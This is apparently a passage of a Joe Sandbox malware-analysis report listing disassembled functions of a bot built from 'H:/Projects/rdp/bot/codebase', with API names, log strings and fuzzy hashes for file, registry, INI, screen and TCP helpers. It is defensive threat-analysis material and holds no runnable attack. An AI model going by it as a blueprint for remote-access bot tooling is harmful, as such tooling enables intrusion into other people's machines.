                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$fclosefopenfwrite
                                                                    • String ID: (mode != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
                                                                    • API String ID: 608220805-961576452
                                                                    • Opcode ID: cef8740fe2e0e89111e01523f6a2a868090a1ed37bbcea809cbf5e3a9790c31d
                                                                    • Instruction ID: bb2e888e046b097c15b3ee3149eaf322efecfc1278d4906c11d52927dd138efb
                                                                    • Opcode Fuzzy Hash: cef8740fe2e0e89111e01523f6a2a868090a1ed37bbcea809cbf5e3a9790c31d
                                                                    • Instruction Fuzzy Hash: DA51D4A2A19E0395FB119B97D9402BC335EAF417B8F8845BAD91D473B4EF7CE9468300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$CreateDirectoryErrorLast$strcpy
                                                                    • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                                                                    • API String ID: 1104438493-906809513
                                                                    • Opcode ID: 6e08ed52c16ada79c7cb7ab3f8e2edfa16f46a302fd01bcf615b761762456f37
                                                                    • Instruction ID: 1203f123f64d66be374483f95f300199d7f8544fe30a011fd7b78172a56481fb
                                                                    • Opcode Fuzzy Hash: 6e08ed52c16ada79c7cb7ab3f8e2edfa16f46a302fd01bcf615b761762456f37
                                                                    • Instruction Fuzzy Hash: 6F717C52F0CE478EFB615B07E8807BE1250AF65B74F4401B2D92E376B6DE2CE8458709
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$fwrite
                                                                    • String ID: (mode != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
                                                                    • API String ID: 116495842-961576452
                                                                    • Opcode ID: 5712fe9cb6afcf4edf8cf5f494c012d9732386242c551838a8e67268020f2fc8
                                                                    • Instruction ID: e4d41e83c8d2e6277fa58e78312bfa077d82e726f385b371b54a1b4f34a9153f
                                                                    • Opcode Fuzzy Hash: 5712fe9cb6afcf4edf8cf5f494c012d9732386242c551838a8e67268020f2fc8
                                                                    • Instruction Fuzzy Hash: 39516D61E09E43CDFA119B16E9416FD6351AF747B0F4801B2D97D672BADF2CE9068308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CloseEnumOpen
                                                                    • String ID: (key != NULL)$(root != NULL)$(subkey != NULL)$(subkey_len != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Step(root=0x%p,key=%s,enum_index=%lu,subkey=%s,subkey_len=%llu)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegEnumKeyExA failed(root=0x%p,key=%s,enum_index=%lu,subkey_len=%llu,res=%lu)$[E] (%s) -> RegOpenKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_enum_key
                                                                    • API String ID: 1332880857-1739142668
                                                                    • Opcode ID: bf57472a2d2e2c07b5e9271786b06ddd0bca9418485668c3a13e4070e26b74aa
                                                                    • Instruction ID: 30122a1d9ff8575d06d37fbb4694c7728548470501459f37f66241c8e4b65da1
                                                                    • Opcode Fuzzy Hash: bf57472a2d2e2c07b5e9271786b06ddd0bca9418485668c3a13e4070e26b74aa
                                                                    • Instruction Fuzzy Hash: 69B18262A0CE438AF73187C6E84037C225AAF85374F6905BAD94E476B4DF7CED868741
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CloseEnumOpen
                                                                    • String ID: (key != NULL)$(root != NULL)$(subkey != NULL)$(subkey_len != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Step(root=0x%p,key=%s,enum_index=%lu,subkey=%s,subkey_len=%llu)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegEnumKeyExA failed(root=0x%p,key=%s,enum_index=%lu,subkey_len=%llu,res=%lu)$[E] (%s) -> RegOpenKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_enum_key
                                                                    • API String ID: 1332880857-1739142668
                                                                    • Opcode ID: 7d33a2ff30b65895c3c83801a503d5bd0afb74b286f737d826f2bdecbd79d124
                                                                    • Instruction ID: a12508eeb7c3e26a9f8d22f3f437b33e6b47473fabca3a8a4b1044650baa5758
                                                                    • Opcode Fuzzy Hash: 7d33a2ff30b65895c3c83801a503d5bd0afb74b286f737d826f2bdecbd79d124
                                                                    • Instruction Fuzzy Hash: 42B1A362A0CE07CFFA628B46E4403BC1291ABA4774F5901B2D57E772B5DE3CE985930D
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CloseEnumOpen
                                                                    • String ID: (key != NULL)$(root != NULL)$(subkey != NULL)$(subkey_len != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Step(root=0x%p,key=%s,enum_index=%lu,subkey=%s,subkey_len=%llu)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegEnumKeyExA failed(root=0x%p,key=%s,enum_index=%lu,subkey_len=%llu,res=%lu)$[E] (%s) -> RegOpenKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_enum_key
                                                                    • API String ID: 1332880857-1739142668
                                                                    • Opcode ID: cd98ccaae0c1c8f1b6a7550b02c3042b026df0d10870bb791dbac2a708f88371
                                                                    • Instruction ID: c039982a453913719efbca78f6f1cf6edcfd46c07781449b6e0cebaa1ad142ca
                                                                    • Opcode Fuzzy Hash: cd98ccaae0c1c8f1b6a7550b02c3042b026df0d10870bb791dbac2a708f88371
                                                                    • Instruction Fuzzy Hash: 45B11EA3E0E74A82F6708F48E5407B82751EB84758F554132D9CE47AB8DF3CE9C69B01
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                                                    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                                                    • API String ID: 3154682637-708158336
                                                                    • Opcode ID: fc4950bd200eb24369f41447302ecffc939822e5fb5845a7e032cfae9a9e038a
                                                                    • Instruction ID: 1131f5a5e73c9027fa27b334195f5eaf22b7150341a2753238489115313db592
                                                                    • Opcode Fuzzy Hash: fc4950bd200eb24369f41447302ecffc939822e5fb5845a7e032cfae9a9e038a
                                                                    • Instruction Fuzzy Hash: B251F525F0CE468AE7205B27E8402BD6290AF65BB4F0403B5E83D666F6DE7DE5458708
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesErrorFileLast
                                                                    • String ID: $(attr != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
                                                                    • API String ID: 1799206407-2463373822
                                                                    • Opcode ID: 1b49e2e9eae9d51044ef7c5525761cf9ab3bcafe663e7b4f2596c0af19da1c18
                                                                    • Instruction ID: cfbecb1fc85fe687add6cb5c56aa8fe4f21385d64f3d4599aa220ddff5280f1d
                                                                    • Opcode Fuzzy Hash: 1b49e2e9eae9d51044ef7c5525761cf9ab3bcafe663e7b4f2596c0af19da1c18
                                                                    • Instruction Fuzzy Hash: D4513DA0A2CE0782FB225F97A4803BC63597F027BCF5445BAC91E466B4FEBDA5458701
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesErrorFileLast
                                                                    • String ID: $(attr != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
                                                                    • API String ID: 1799206407-2463373822
                                                                    • Opcode ID: 2e6c9001c0c235b62e19022b44b506365d7aa829aef5c15fd1a6778d35aab4b3
                                                                    • Instruction ID: f21cabb63969ba51708925a4a3ebfa610bd2d37c0f64505c9b62a5e9f82d0ae0
                                                                    • Opcode Fuzzy Hash: 2e6c9001c0c235b62e19022b44b506365d7aa829aef5c15fd1a6778d35aab4b3
                                                                    • Instruction Fuzzy Hash: 69515060E0CE47CEFA605B07A8403BC62107F357B4F1402B2CE3EA65B6EE6DA945D349
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
                                                                    • String ID: (path != NULL)$5$H:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc
                                                                    • API String ID: 1423203057-3539035513
                                                                    • Opcode ID: 9c2c6add5ec6bc6832b324291e38b65c176291e6962ad2f08c5ba4a7ebbdef12
                                                                    • Instruction ID: 8900c6a2fc7951556e252d645c768a5dff054a1852c5eac00503a0414499c997
                                                                    • Opcode Fuzzy Hash: 9c2c6add5ec6bc6832b324291e38b65c176291e6962ad2f08c5ba4a7ebbdef12
                                                                    • Instruction Fuzzy Hash: 1EA1BF62A0DF8291FB218B97E4503BD2759AB42BA4F4880F9DE8D47BB5DE7CE545C300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
                                                                    • String ID: (path != NULL)$5$H:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc
                                                                    • API String ID: 1423203057-3539035513
                                                                    • Opcode ID: 481a3fd7fd33de27e9821d400400a7bc4dfbdc80f3d27d32b68a358ca3ade38f
                                                                    • Instruction ID: 097ec4f64e1ca49fabfa778ac9c59392d6754b0f2eeedb83ce40cfb6cf0fa730
                                                                    • Opcode Fuzzy Hash: 481a3fd7fd33de27e9821d400400a7bc4dfbdc80f3d27d32b68a358ca3ade38f
                                                                    • Instruction Fuzzy Hash: EFA1B762A0DE8289FA10CB16E4407BD6F61EF607A4F4840B1DE6D6B7B5DE7CE545C308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastMetricsSystem$fflushfwrite
                                                                    • String ID: (height != NULL)$(ratio != NULL)$(width != NULL)$H:/Projects/rdp/bot/codebase/sys.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GetSystemMetrics(SM_CXSCREEN) failed(gle=%lu)$[E] (%s) -> GetSystemMetrics(SM_CYSCREEN) failed(gle=%lu)$c$sys_screen_info
                                                                    • API String ID: 144387239-4168848430
                                                                    • Opcode ID: 75f0d930e48f1617a79b87325525bd4fedaac5cb75cff747d53f236e553ddb16
                                                                    • Instruction ID: 8693c7c70e87755966e2bdefd2ab0b2925bfb0d6e5ae1ca2d374d1889044719c
                                                                    • Opcode Fuzzy Hash: 75f0d930e48f1617a79b87325525bd4fedaac5cb75cff747d53f236e553ddb16
                                                                    • Instruction Fuzzy Hash: 9E718050E1CD4396FB71968BA40037C2A9E6F06779F9404BAD54F8A2B4DFACE981C302
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastMetricsSystem$fflushfwrite
                                                                    • String ID: (height != NULL)$(ratio != NULL)$(width != NULL)$H:/Projects/rdp/bot/codebase/sys.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GetSystemMetrics(SM_CXSCREEN) failed(gle=%lu)$[E] (%s) -> GetSystemMetrics(SM_CYSCREEN) failed(gle=%lu)$c$sys_screen_info
                                                                    • API String ID: 144387239-4168848430
                                                                    • Opcode ID: d9545ac20c73ac018aa11dd156e4855825c70b1877caadbc86d7f78798e58423
                                                                    • Instruction ID: 44d8011ccb2fc71f2f10b9fd70f8a806cbd24a6ad4b8b4ba595f7c10c05d3d41
                                                                    • Opcode Fuzzy Hash: d9545ac20c73ac018aa11dd156e4855825c70b1877caadbc86d7f78798e58423
                                                                    • Instruction Fuzzy Hash: 71714C50F0CE47CEFB649767A41037CA1956F24378F5000F2E92EEA6B5DEACA985834D
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentErrorExpandLastStringsfflushfwrite
                                                                    • String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
                                                                    • API String ID: 1721699506-2273971785
                                                                    • Opcode ID: 0975a678754ac78b9d7f3c178b0852587d3cc906738610f6a04067a41accab83
                                                                    • Instruction ID: 224a73c40968ac7112ce0bc0c22228fc7142c0e7bdc265a15f8fd2f5e11778c0
                                                                    • Opcode Fuzzy Hash: 0975a678754ac78b9d7f3c178b0852587d3cc906738610f6a04067a41accab83
                                                                    • Instruction Fuzzy Hash: C7612E61E0CD47D5FB618B9AE8407BC235AAF81378F5944BAC94D471B9DE3CE9468301
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentErrorExpandLastStringsfflushfwrite
                                                                    • String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
                                                                    • API String ID: 1721699506-2273971785
